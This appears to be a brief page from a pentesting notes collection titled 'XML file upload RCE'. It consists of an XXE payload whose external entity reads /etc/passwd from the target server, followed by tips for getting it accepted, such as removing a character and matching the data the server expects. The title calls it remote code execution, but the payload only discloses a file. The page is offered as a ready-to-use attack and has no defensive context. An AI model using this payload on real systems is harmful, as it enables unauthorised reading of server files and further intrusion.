XML file upload RCE

?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

  • you might need to remove the # from ELEMENT

  • you might need specific data sets that the web server requires.

Previousspecial charactersNextPostgress creds found?

Last updated